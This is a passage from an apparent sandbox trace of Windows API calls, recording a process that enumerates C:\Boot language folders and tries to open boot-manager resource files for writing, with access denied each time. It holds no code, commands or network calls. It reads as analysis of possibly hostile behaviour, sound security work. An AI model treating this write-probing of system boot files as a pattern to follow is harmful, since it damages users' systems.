lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.949] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.950] CloseHandle (hObject=0x430) returned 1 [0082.950] AreFileApisANSI () returned 1 [0082.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0082.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui") returned 30 [0082.950] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.950] GetLastError () returned 0x5 [0082.950] GetLastError () returned 0x5 [0082.950] SetLastError (dwErrCode=0x5) [0082.950] GetLastError () returned 0x5 [0082.950] SetLastError (dwErrCode=0x5) [0082.950] GetLastError () returned 0x5 [0082.950] SetLastError (dwErrCode=0x5) [0082.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.950] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎠")) returned 0 [0082.950] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.951] AreFileApisANSI () returned 1 [0082.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-MX", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-MX", lpUsedDefaultChar=0x0) returned 14 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.951] AreFileApisANSI () returned 1 [0082.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88720 [0082.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-MX") returned 14 [0082.952] CreateFileW (lpFileName="C:\\Boot\\es-MX" (normalized: "c:\\boot\\es-mx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.952] GetLastError () returned 0x5 [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.952] AreFileApisANSI () returned 1 [0082.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-MX") returned 14 [0082.952] CreateFileW (lpFileName="C:\\Boot\\es-MX" (normalized: "c:\\boot\\es-mx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.952] GetLastError () returned 0x5 [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] GetLastError () returned 0x5 [0082.952] SetLastError (dwErrCode=0x5) [0082.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.953] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.953] FindFirstFileExW (in: lpFileName="C:\\Boot\\es-MX\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78450 [0082.953] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.953] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.954] AreFileApisANSI () returned 1 [0082.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-MX\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.954] AreFileApisANSI () returned 1 [0082.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 30 [0082.955] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.955] GetFileType (hFile=0x430) returned 0x1 [0082.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.955] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.955] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.955] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.955] CloseHandle (hObject=0x430) returned 1 [0082.956] AreFileApisANSI () returned 1 [0082.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0082.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 30 [0082.956] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.956] GetLastError () returned 0x5 [0082.956] GetLastError () returned 0x5 [0082.956] SetLastError (dwErrCode=0x5) [0082.956] GetLastError () returned 0x5 [0082.956] SetLastError (dwErrCode=0x5) [0082.956] GetLastError () returned 0x5 [0082.956] SetLastError (dwErrCode=0x5) [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.956] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⽠\x01⺊Ā")) returned 0 [0082.956] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0082.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.957] AreFileApisANSI () returned 1 [0082.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\et-EE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\et-EE", lpUsedDefaultChar=0x0) returned 14 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0082.957] AreFileApisANSI () returned 1 [0082.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0082.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\et-EE") returned 14 [0082.958] CreateFileW (lpFileName="C:\\Boot\\et-EE" (normalized: "c:\\boot\\et-ee"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, 